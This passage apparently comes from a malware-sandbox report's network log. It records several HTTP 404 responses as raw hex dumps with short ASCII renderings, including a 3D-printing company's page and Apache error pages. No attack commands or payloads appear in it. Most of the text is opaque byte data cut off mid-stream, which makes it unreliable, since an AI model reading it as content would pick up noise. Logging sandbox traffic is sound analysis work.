38 28 8c f3 26 58 19 b3 52 64 55 eb 49 64 e9 d4 1a 66 df 98 16 49 3e 87 af c9 f4 67 b1 a0 41 33 b8 75 0a fc 37 a9 0e c1 fa 22 cb 7c cd 6b be 1c 8b b4 32 0d 81 36 a1 e5 c1 cd 62 7a d3 43 16 13 e5 4a a2 cb ce 36 96 01 bd 6e d6 5a 65 b8 f0 d9 28 1f 8d b3 fc 22 6d 31 1b 0b 56 95 41 34 b3 1f f8 48 16 5d 99 fc 9e eb 0e 63 08 1b 19 02 b9 9a c2 15 c2 a5 51 a4 58 5c 54 dc 09 f6 0f f5 6d d3 70 d7 dd 1c e4 a4 eb 86 62 27 59 76 8f 2b 93 c8 f5 07 7e 13 94 79 ef 9b 60 ea 6f a8 a0 e5 95 d4 7f a1 9d e8 85 35 46 58 41 67 4f ae 1a cb ee 59 83 4d 99 37 46 33 15 09 3d 89 1c d8 ec 24 61 36 ba 43 3f ce d5 ba 9c a4 c3 74 98 df fe 36 20 eb 8e fe 6f ae 54 6f 4e 65 4e e5 7d b6 0b 92 8b 04 4a 1b a9 d3 ca 7b cc 08 d1 5d f9 22 cb 2a a1 6f 7d 5a 29 d3 8a a5 e2 8e 6a 21 08 df 6c 8b 72 f0 16 d7 e0 1b f2 a6 a1 ec 34 1d 4e d2 1c 41 ac 52 c0 35 bc 18 a0 ab b2 34 3a f8 54 87 65 72 2b 7d 85 e7 56 de 5f ed c0 e4 d7 95 f7 17 a4 8a 49 9e 1f 9f 3f 7c cd d7 a4 ff b9 76 a6 98 e4 79 72 9e e7 c9 24 cf ef b4 82 b3 fb 76 e1 29 94 8a 07 a9 93 73 6f 83 d1 36 24 6b 49 41 f3 86 3c 91 14 3b 8f b4 3b d6 f3 8c 66 dc 91 bc 2a 00 2c 8c e8 12 a9 6d 1b 92 41 fb 5e 24 41 a0 6d e0 8e f8 70 8d 97 04 a3 b1 eb d0 ac 98 da 43 70 ed 4c 9c 20 36 7b 42 62 f3 c7 5a 4e ba 99 ee 91 31 3c 04 b4 13 68 9a 20 7e 62 74 c0 fd a2 3f 26 4e f1 c4 11 c5 70 34 e4 07 c0 22 18 f6 dc 6e 73 bd b9 7a 98 d4 a3 a4 1e 27 f5 24 a9 4f 93 fa 8c 9f 69 ef 2f 48 b1 42 21 1e 3d c7 8e b9 d2 b4 6a 2c eb fd 39 af ae 1f cd 81 da 34 c6 08 bf b0 8b 0a 9e 11 1c 0e 2f f3 8b 7c 08 f1 2c 45 c1 36 b4 f8 2b 03 2b c3 0b 32 ab 78 45 b5 51 82 1c 69 ef 27 6a af fa c8 13 e4 c7 09 2e f3 e3 01 d8 89 6f cc 7f a0 fd 03 58 e3 69 e3 84 94 ca ca e8 62 e7 43 b6 09 e7 4a d5 9c 56 6a b8 54 bd 5f 49 b2 7d 12 68 1b 7a bf 68 18 31 bb 0b 1c 1a a0 dd 60 37 4e 00 ff e2 26 a2 9a 92 1a 06 77 b3 a2 Data Ascii: c34?wUz1lf0==
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: afb_HTTP.404content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache; privatex-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 30 May 2024 13:02:40 GMTserver: LiteSpeedData Raw: 63 33 34 0d 0a 80 90 02 80 f8 9f da ea 3f 77 55 07 f9 19 7a 31 cc b3 6c 43 d3 9b c1 f4 ac 0b b3 ad 3d c2 ba 60 f5 c8 92 9e 24 03 fe 14 55 3f c8 7f 10 64 ff de b5 5e 21 2b 94 ad f0 49 26 62 ef 3e 21 4e 26 39 da db 4f 84 6d 15 d3 f3 55 0a 00 85 ac 91 ad b1 15 aa 8f 31 bd af 9d 94 a3 88 40 ad 6c 26 46 c0 45 66 07 d1 41 34 ad 43 a3 06 b0 7a a3 b2 47 9a 7d fa d0 9b 1d 44 00 b0 87 38 fe cd ae 1b dc 50 38 68 fe 52 4f a1 ec 6d 09 9e 4e 53 43 f3 86 ca 9e 08 f9 f5 88 84 6d ab 07 94 04 75 4a b0 f9 f7 c6 cc 57 5c 51 39 ec 11 e5 c6 04 36 68 5f fb c3 e3 b7 60 6c d6 8e 0f fb f0 ec fe b3 fb 4f 70 fa 68 87 66 0a 66 03 16 7f 9f 87 46 57 8e 02 e1 f4 11 e6 4e ea 20 f5 0a 4f 5a a5 3a 3c d7 81 56 8e 07 12 78 6f 16 26 c8 0a 1f 3a 1f a8 f1 bd 6c 76 30 22 d5 44 b3 02 9a 9c a5 71 50 18 e7 4d b0 32 66 a5 c8 aa d6 93 c8 d2 a9 35 cc be 31 2d 92 7c 0e 5f 93 e9 cf 62 41 83 66 70 eb 14 f8 6f 52 1d 82 f5 45 96 f9 9a d7 7c 79 2a d2 ca 34 04 da 84 96 07 37 8b e9 4d 0f 59 4c 94 2b 89 2e 3b db 58 06 f4 ba 59 6b 95 e1 c2 67 a3 7c 74 9a e5 97 69 8b d9 a9 60 55 19 44 33 fb 81 8f 64 d1 95 c9 ef b9 ee 30 86 b0 91 21 90 ab 29 5c 21 5c 1a 45 8a c5 45 c5 9d 60 ff 50 df 36 0d 77 dd cd 41 4e ba 6e 28 76 92 65 f7 b8 32 89 5c 7f e0 37 41 99 f7 be 09 a6 fe 86 0a 5a 5e 49 fd 17 da 89 5e 58 63 84 15 74 f6 e4 aa b1 ec 9e 35 d8 94 79 63 34 53 91 d0 93 c8 81 cd 4e 12 66 a3 3b f4 e3 5c af cb 71 3a 4c 87 f9 ed 6f 03 b2 ee e8 ff e6 4a f5 66 54 e6 54 de 67 bb 20 b9 48 a0 b4 91 3a ad bc c7 8c 10 dd 95 2f b2 ac 12 fa d6 a7 95 32 ad 58 2a ee a8 16 82 f0 cd b6 28 07 6f 71 0d be 21 6f 1a ca ce d2 e1 38 cd 11 c4 2a 05 5c c3 8b 01 ba 2a 4b a3 83 4f 75 58 26 b7 d2 57 78 6e e5 fd f5 0e 4c 7e 5d 79 7f 41 aa 18 e7 f9 f1 c5 c3 d7 7c 4d fa 9f b9 33 c5 38 cf 93 8b 3c 4f c6 79 7e a7 15 9c dd b7 0b 4f a1 54 3c 48 9d 9c 7b 1b 8c b6 21 59 4b 0a 9a 37 e4 89 a4 d8 59 a4 dd b1 9e 67 34 e3 8e e4 55 01 60 61 44 97 48 6d db 90 0c da f7 22 09 02 6d 03 77 c4 87 6b bc 24 18 8d 5d 87 66 c5 d4 1e 82 b9 33 71 82 d8 ec 09 89 cd 1f 6b 39 e9 66 b2 47 c6 f0 10 d0 4e a0 69 82 f8 89 d1 01 f7 8b fe 98 38 c3 13 47 14 c3 d1 90 1f 00 8b 60 d8 0b bb cd f5 e6 ea 61 52 8f 92 fa 34 a9 c7 49 7d 96 d4 e7 fc 4c 7b 7f 41 8a 15 0a f1 e8 39 76 cc 95 a6 55 63 59 ef cf 79 75 fd 68 0e d4 a6 31 46 f8 85 5d 54 f0 8c e0 70 78 95 5f e6 43 88 67 29 0a b6 a1 c5 5f 19 58 19 5e 90 59 c5 2b aa 8d 12 e4 48 7b 3f 51 7b d5 47 9e 20 3f 4e 70 95 1f 0f c0 4e 7c 63 fe 03 ed 1f c0 1a 4f 1b 27 a4 54 56 46 17 3b 1f b2 4d 38 57 aa e6 b4 52 c3 a5 ea fd 4a 92 ed 93 40 db d0 fb 45 c3 88 d9 5d e0 d0 00 ed 06 bb 71 02 f8 17 37 11 d5 94 d4 30 b8 9b 15 Data Ascii: c34?wUz1lC=
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: afb_HTTP.404content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache; privatex-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 30 May 2024 13:02:43 GMTserver: LiteSpeedData Raw: 63 33 33 0d 0a 80 90 02 80 f8 9f da ea 3f 77 55 07 f9 19 7a 31 cc b3 6c b3 f4 66 30 3d eb d2 b3 ad 3d c2 ba 60 f5 c8 92 9e 24 03 fe 14 55 3f c8 7f 10 64 ff de b5 5e 21 2b 94 ad f0 49 26 62 ef 3e 21 4e 26 39 da db 4f 84 6d 15 d3 f3 55 0a 00 85 ac 91 ad b1 15 aa 8f 31 bd af 9d 94 a3 88 40 ad 6c 26 46 c0 45 e6 07 d1 41 34 ab 43 a3 06 b0 7a a3 b2 47 9a 7d fa d0 9b 1f 44 00 b0 87 38 fe cd ae 1b dc 50 38 68 fe 52 4f a1 ec 6d 09 9e 4e 53 43 f3 86 ca 9e 08 f9 f5 88 84 6d ab 07 94 04 75 4a b0 f9 f7 c6 cc 57 5c 51 39 ec 11 e5 c6 04 36 68 5f fb c3 e3 b7 60 6c de 8e 0f fb f0 ec fe b3 fb 4f 30 7e b4 43 33 05 b3 01 8b bf cf 43 a3 2b 47 81 30 7e 84 6b 27 75 90 7a 85 27 ad 52 1d 9e eb 40 2b c7 03 09 bc 37 0b 13 64 85 0f 9d 0f d4 f8 5e 36 3f 18 91 6a a2 59 01 4d ce d2 38 28 8c f3 26 58 19 b3 52 64 55 eb 49 64 e9 d4 1a 66 df 98 16 49 3e 87 af c9 f4 67 b1 a0 41 33 b8 75 0a fc 37 a9 0e c1 fa 22 cb 7c cd 6b be 1c 8b b4 32 0d 81 36 a1 e5 c1 cd 62 7a d3 43 16 13 e5 4a a2 cb ce 36 96 01 bd 6e d6 5a 65 b8 f0 d9 28 1f 8d b3 fc 22 6d 31 1b 0b 56 95 41 34 b3 1f f8 48 16 5d 99 fc 9e eb 0e 63 08 1b 19 02 b9 9a c2 15 c2 a5 51 a4 58 5c 54 dc 09 f6 0f f5 6d d3 70 d7 dd 1c e4 a4 eb 86 62 27 59 76 8f 2b 93 c8 f5 07 7e 13 94 79 ef 9b 60 ea 6f a8 a0 e5 95 d4 7f a1 9d e8 85 35 46 58 41 67 4f ae 1a cb ee 59 83 4d 99 37 46 33 15 09 3d 89 1c d8 ec 24 61 36 ba 43 3f ce d5 ba 9c a4 c3 74 98 df fe 36 20 eb 8e fe 6f ae 54 6f 4e 65 4e e5 7d b6 0b 92 8b 04 4a 1b a9 d3 ca 7b cc 08 d1 5d f9 22 cb 2a a1 6f 7d 5a 29 d3 8a a5 e2 8e 6a 21 08 df 6c 8b 72 f0 16 d7 e0 1b f2 a6 a1 ec 34 1d 4e d2 1c 41 ac 52 c0 35 bc 18 a0 ab b2 34 3a f8 54 87 65 72 2b 7d 85 e7 56 de 5f ed c0 e4 d7 95 f7 17 a4 8a 49 9e 1f 9f 3f 7c cd d7 a4 ff b9 76 a6 98 e4 79 72 9e e7 c9 24 cf ef b4 82 b3 fb 76 e1 29 94 8a 07 a9 93 73 6f 83 d1 36 24 6b 49 41 f3 86 3c 91 14 3b 8f b4 3b d6 f3 8c 66 dc 91 bc 2a 00 2c 8c e8 12 a9 6d 1b 92 41 fb 5e 24 41 a0 6d e0 8e f8 70 8d 97 04 a3 b1 eb d0 ac 98 da 43 70 ed 4c 9c 20 36 7b 42 62 f3 c7 5a 4e ba 99 ee 91 31 3c 04 b4 13 68 9a 20 7e 62 74 c0 fd a2 3f 26 4e f1 c4 11 c5 70 34 e4 07 c0 22 18 f6 dc 6e 73 bd b9 7a 98 d4 a3 a4 1e 27 f5 24 a9 4f 93 fa 8c 9f 69 ef 2f 48 b1 42 21 1e 3d c7 8e b9 d2 b4 6a 2c eb fd 39 af ae 1f cd 81 da 34 c6 08 bf b0 8b 0a 9e 11 1c 0e 2f f3 8b 7c 08 f1 2c 45 c1 36 b4 f8 2b 03 2b c3 0b 32 ab 78 45 b5 51 82 1c 69 ef 27 6a af fa c8 13 e4 c7 09 2e f3 e3 01 d8 89 6f cc 7f a0 fd 03 58 e3 69 e3 84 94 ca ca e8 62 e7 43 b6 09 e7 4a d5 9c 56 6a b8 54 bd 5f 49 b2 7d 12 68 1b 7a bf 68 18 31 bb 0b 1c 1a a0 dd 60 37 4e 00 ff e2 26 a2 9a 92 1a 06 77 b3 a2 Data Ascii: c33?wUz1lf0==
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache; privatex-litespeed-cache-control: public,max-age=3600x-litespeed-tag: afb_HTTP.404,afb_404,afb_URL.bb612978f523fb6348e4e3107ed53975,afb_x-litespeed-cache: misstransfer-encoding: chunkeddate: Thu, 30 May 2024 13:02:45 GMTserver: LiteSpeedData Raw: 32 39 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 45 4f 20 2d 2d 3e 0d 0a 3c 74 69 74 6c 65 3e 53 48 41 48 41 46 20 33 44 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 6e 63 72 65 74 65 20 33 44 20 50 72 69 6e 74 69 6e 67 20 46 75 6c 6c 79 20 49 6e 74 65 67 72 61 74 65 64 20 52 6f 62 6f 74 69 63 20 53 79 73 74 65 6d 73 22 2f 3e 0d 0a 3c 21 2d 2d 20 6f 67 20 6d 65 74 61 20 66 6f 72 20 66 61 63 65 62 6f 6f 6b 2c 20 67 6f 6f 67 6c 65 70 6c 75 73 20 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 48 41 48 41 46 20 33 44 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 6e 63 72 65 74 65 20 33 44 20 50 72 69 6e 74 69 6e 67 20 46 75 6c 6c 79 20 49 6e 74 65 67 72 61 74 65 64 20 52 6f 62 6f 74 69 63 20 53 79 73 74 65 6d 73 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 68 61 68 61 66 33 64 2e 63 6f 6d 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 68 61 68 61 66 33 64 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 38 2f 73 68 61 68 61 66 2d 33 64 2d 63 6f 6e 63 72 65 74 65 2d 70 72 69 6e 74 69 6e 67 2e 6a 70 67 22 2f 3e 0d 0a 0d 0a 3c 21 2d 2d 20 74 77 69 74 74 65 72 20 6d 65 74 61 20 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 2f 3e 0d 0a 3c 6d Data Ascii: 29ac<!DOCTYPE html><html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" cont
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 13:03:14 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 13:03:17 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 13:03:19 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 